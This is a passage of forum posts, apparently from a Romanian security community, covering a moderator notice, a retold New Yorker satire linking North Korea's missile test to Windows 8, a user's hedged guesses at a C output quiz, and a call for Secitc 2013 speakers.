     PS: I have moved only a few topics here from ShowOff as examples; we will move here the ShowOff topics that fit this category. You can send me a PM with specific topics to be moved here.
  23. North Korea in a satire from "The New Yorker": the missile test was cancelled because of Microsoft Windows 8
     The American publication "The New Yorker" has a new satire in "The Borowitz Report" series, and the new targets are North Korea and Windows 8 from Microsoft. "North Korea's official news agency announced today that the missile test was cancelled because of problems with Windows 8", thus begins the text in "The New Yorker". This country is in the spotlight these days following its threats, and Andy Borowitz takes advantage of the moment to write a satire that also takes in the Microsoft product. "Intelligence agencies said the announcement offers a rare glimpse into how North Korea's missile programme works, which last year was running on Windows 95", Borowitz continues. The same official news agency reports that the test has been postponed indefinitely. Probably until they roll their computers back to Windows 95. The author does not forget to back up his information with a source, what else but one close to the North Korean regime. "Supreme leader Kim Jong Un is furious about the problems with Windows 8 and is considering several options, including declaring war on Microsoft", Borowitz ends his article. Apple equipment is probably a little too expensive. The original article is available on the publication's website.
     Source: North Korea in a satire from "The New Yorker": the missile test was cancelled because of Microsoft Windows 8 | adevarul.ro
  24. 1. Undefined result: for functions called as parameters of another function call there is no guarantee that the first one is executed first. It prints "paxlozls" or "lozlspax" depending on the compiler, then 40.
     2. Comparison between an integer and a float, again undefined results, but most likely it prints "RST" forever, because floating-point numbers are not stored exactly, and 0.1 may be stored as 0.09999998 or as 1.10000001 or who knows how. There is a formula for how they are stored, but I don't remember it any more.
     3. Same thing, it may print "HELLO" 4-5 times and "WORLD" 5-6 times. It will also generate warnings when comparing an integer with a floating-point number.
     4. I don't remember operator precedence, I always keep a sheet next to me. But without consulting the table, I think "<" has higher precedence, in which case it prints "TSR".
     5. I can't figure out the trick. 39?
     6. NERFMETINTEAM
  25. Nytro

    Secitc 2013

    The deadline for anyone who wants to present is 19 May. Who is coming? Does anyone want to present something?